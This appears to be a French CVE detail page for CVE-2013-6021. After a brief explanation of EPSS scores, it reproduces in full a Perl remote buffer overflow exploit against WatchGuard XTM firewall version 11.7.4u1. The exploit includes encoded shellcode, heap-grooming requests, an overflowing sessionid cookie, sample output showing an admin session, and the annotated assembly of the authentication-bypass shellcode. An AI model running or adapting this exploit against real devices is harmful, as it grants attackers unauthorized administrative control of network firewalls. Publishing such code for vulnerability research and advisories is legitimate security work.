CVE-2013-6021 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl -w # Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie # Date: Oct 18 2013 # Exploit Author: [email protected] (a.k.a. [email protected]) # Vendor Homepage: http://www.watchguard.com # Version: <= 11.7.4u1 # Tested on: XTMv # CVE : CVE-2013-6021 =header ********************************************************************* ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************************* ** ** ** Author: [email protected] ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************************* ** ** ** - Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ** - Decoded shellocde can be found at the end of this file ** ** ** ********************************************************************* =cut =output sample [*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong' [*] Checking sessionid cookie for bad chars [*] Checking shellcode for bad chars [*] Heap messaging (request 1) : ... [*] Sending authentication bypass shellcode (request 2) [*] HTTP Response : -------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-type: text/xml Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014 Date: Sun, 27 Oct 2013 21:11:38 GMT Server: none Content-Length: 751 <?xml version="1.0"?> <methodResponse> <params> <param> <value> <struct> <member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member> <member><name>response</name><value></value></member> <member> <name>readwrite</name> <value><struct> <member><name>privilege</name><value>2</value></member> <member><name>peer_sid</name><value>0</value></member> <member><name>peer_name</name><value>error</value></member> <member><name>peer_ip</name><value>0.0.0.0</value></member> </struct></value> </member> </struct> </value> </param> </params> </methodResponse> -------------------------------------------------------------------------------- [*] Over. =cut use warnings; use strict; use IO::Socket::SSL; # host and port of the XTM web console my $host = "192.168.60.200"; my $port = "8080"; # Shellcode (watch out bad chars) my $shellcode = # shellcode: bypass password verification and return a session cookie "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" . "KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" . "eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" . "9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" . "RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" . "sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" . "ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" . "benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" . "LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A"; # Shellocde max length my $shellcode_max_len = 2000; # set our shellcode address into EAX (expected by alpha2 encoder) my $alpha2_ecx24 = "\x8b\x41\x24" . # mov eax, [ecx+0x24] "\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled) "\x83\xc0\x40" . # add eax, 0x40 "\x83\xe8\x35"; # sub eax, 0x35 # for the reader, "add eax, edx" contains bad chars. # This is the reason why the nopsled decrement EDX and that we use "dec eax, edx" # flush after every write $| = 1; # HTTP POST data for authentication request my $login_post_data = "<methodCall><methodName>login</methodName><params><param><value><struct><member>" . "<name>password</name><value><string>foo</string></value></member><member>" . "<name>user</name><value><string>admin</string></value></member></struct></value>" . "</param></params></methodCall>"; # list of bad characters my @badchars = ( "\x00", "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a", "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13", "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c", "\x1d", "\x1e", "\x1f", "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters ); # function: Check input for badchars. sub check_badchars { my $in = shift; my $stop = 0; for(my $i=0; $i<length($in); $i++){ my $c = substr($in,$i,1); if($c ~~ @badchars){ printf " - bad char '0x%02x' found\n", ord($c); $stop = 1; } } if($stop){ exit; } } # function: testing remote connectivity with the appliance # send HTTP "ping" request and expect "pong" reply sub testing_connectivity { print "[*] Sending HTTP ping request to https://$host:$port : "; my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ my $req = "GET /ping HTTP/1.0\r\n" . "Host:$host:$port" . "\r\n" . "\r\n"; # send ping print $sock $req; my $resp=''; my $pong = 0; # read answer while (my $line = <$sock>){ if($line =~ /pong/) { $pong = 1;} $resp .= $line; } # got pong ? if($pong){ print "OK. Got 'pong'\n"; }else{ print "ERROR. Expecting 'pong' response but received :\n"; print $resp; exit; } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } } # function: HTTP request used for HEAP messaging phase sub building_request_step1 { my $sessionid = "A" x 120; # do not overflow now my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" . "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" . "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: 3\r\n" . "\r\n" . "foo" ; return $req; } # function: HTTP request used for buffer overflow exploitation sub building_request_step2 { my $sessionid = "A" x 140 . # junk "\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap). # 0x8068544 contains a "good memory chunk" which satisfy all rules print "[*] Checking sessionid cookie for bad chars\n"; check_badchars($sessionid); my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 1879 . "\r\n" . "Connection: keep-alive" . "a" x 22 . "\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops $alpha2_ecx24 . # set EAX to shellcode addr $shellcode . # shellcode "\r\n" . "Accept-Encoding: identity," . "b" x 1386 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: " . length($login_post_data). "\r\n" . "\r\n" . $login_post_data ; return $req; } # function: Send an HTTP request. sub send_http_request { my $req = shift; my $read_answer = shift || 0; my $http_resp=''; # Open socket my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ print $sock $req; # do we need the answer ? if ($read_answer){ my $is_chunked = 0; my $is_body = 0; while(my $line = <$sock>){ if($line =~ /Transfer-Encoding: chunked/){ $is_chunked = 1; next; } if($line eq "\r\n"){ # we reached the body if($is_chunked){ $line = <$sock>; # chunk length $line =~ s/\r\n//g; $sock->read(my $data, hex($line)); # read chunk $http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line); $http_resp .= $data; close $sock ; return $http_resp; } } $http_resp .= $line; } } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } return $http_resp; } ### MAIN #### # print banner print << 'EOF'; ********************************************************** ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************** ** ** ** Author: [email protected] ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************** ** ** ** Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ********************************************************** EOF # Send an HTTP ping request testing_connectivity(); # building HTTP requests my $request_step1 = building_request_step1(); my $request_step2 = building_request_step2(); # Testing shellcode against bad cahrs print "[*] Checking shellcode for bad chars\n"; check_badchars($shellcode); # Fillin the heap print "[*] Heap messaging (request 1) : "; for(my $i=0 ; $i<3 ; $i++){ send_http_request($request_step1); print "."; } print "\n"; # Exploiting print "[*] Sending authentication bypass shellcode (request 2)\n"; my $resp = send_http_request($request_step2,1); print "[*] HTTP Response : \n\n"; print "-" x 80 . "\n"; print $resp; print "-" x 80 . "\n\n"; print "[*] Over.\n"; exit; =shellcode ;------------------------------------------------ ; shellcode-get-gession.asm ; by Jerome Nokin for XTM(v) 11.7.4 update 1 ;------------------------------------------------ global _start _start: ; current EBP/ESP values ;------- ; esp 0x3ff0b518 ; ebp 0x3ff0b558 ; first, fix the stack in HTTP_handle_request function ; ------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we'll do ;--------- ;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472' ; 3ff0b6f0 ; ESP = ESP + 472 ;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312' ; 3ffffcb8 ; EBP = EBP + 1001312 ; fix ESP/EBP add esp, 472 add ebp, 1001312 ; fixing overwritten ptrs ; finding initial malloc pointer v50 (overwritten) ; 0805f000-08081000 rwxp 00000000 00:00 0 [heap] ; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14) ; example inside gdb ;b *0x8051901 ;b *0x80519c0 ;(gdb) x/xw $ebp-0xf8 <===== v55 ;0x3ffffbc0: 0x08065b90 ;(gdb) x/xw $ebp-0xfc <===== v54 ;0x3ffffbbc: 0x08067fe0 ;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap ;0x8063b48 ;1 pattern found. ;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10 ;0x8063b38: 0x00000001 ; search this sequence on the heap mov eax, [ebp-0xfc] ; v54 mov ebx, [ebp-0xf8] ; v55 mov edi, 0x0805f000 ; heap start addr loop: add edi, 4 lea esi, [edi+4] cmp esi, 0x08081000 ; edi is out of the heap ? je loop_end cmp [edi], eax ; cmp v54 jne loop cmp [edi+4], ebx ; cmp v55 je found jmp loop loop_end: mov eax, 0x08063b38 ; default value (should not be reached) found: lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr) ; EBP-0x10c ; saved content of v50 (malloc) = ebp-0x10c mov [ebp-0x10c], eax ; reset EBX (see following) ; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784> ; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793 ; .... ; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp] ; 8055bf9: c3 ret mov ebx, 0x805dff4 ; EBP-0x108 ; just reset it to 0 mov dword [ebp-0x108], 0x0 ; EBP-0x100 ; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc] ; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax mov eax, [eax+0xc] mov [ebp-0x100], eax ; simulate call to login function. copy args mov ecx, [ebp-0x10c] mov eax, [ebp-0x198] mov edx, [ebp-0x194] mov [esp+0x4],eax mov [esp+0x8],edx mov [esp],ecx ; Now setup the login function stack ; current esp/ebp ; ---------------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we want to land into the login function ; --------------------------------------- ; esp 0x3ff0b420 ; ebp 0x3ff0b6e8 ; we'll do ;--------- ; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720' ; 3ff0b420 ; ESP = ESP - 720 ; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912' ; 3ff0b6e8 ; EBP = EBP - 1000912 ; stack fix sub esp, 720 sub ebp, 1000912 ; EBX -> .GOT (same as above btw) mov ebx, 0x805dff4 ; simulate "decode HTTP content" fct, at top of the login function mov edx, [ebp+0x8] mov edx, [edx+0x8] mov dword [esp+0x4], 0x0 ; no content_encoding header mov [esp], edx mov esi, 0x0804d990 call esi ; decode content mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1 ; simulate "search remote_address" mov eax, [ebp+0x8] mov eax, [eax+0x14] mov [esp+0x4],eax lea eax,[ebx-0x3ceb] mov [esp],eax mov esi, 0x804b670 ;FCGX_GetParam call esi add eax, 0x7 ; remove '::ffff:' ====> to improve mov [ebp-0x60], eax ; is_admin = 4 mov dword [ebp-0x48], 0x4 ; simulate "search req_user value" mov eax, [ebp-0x70] mov eax, [eax+0x50] mov dword [esp+0x8],0x0 lea edx,[ebx-0x3c93] mov [esp+0x4],edx mov [esp],eax mov esi, 0x804c07e call esi ; <FCGX_PutStr@plt+0x3de> mov [ebp-0x68],eax ; v49 = 2 (ipv4) mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1 ; challenge mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1 ; set v43 to null mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1 ; ok, we are ready to jump in the middle of the "login" function ; right after the password verification ; jump here ; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200 ; 804ee52: 00 ; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1 ; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt> mov edi, 0x804ee4b jmp edi =cut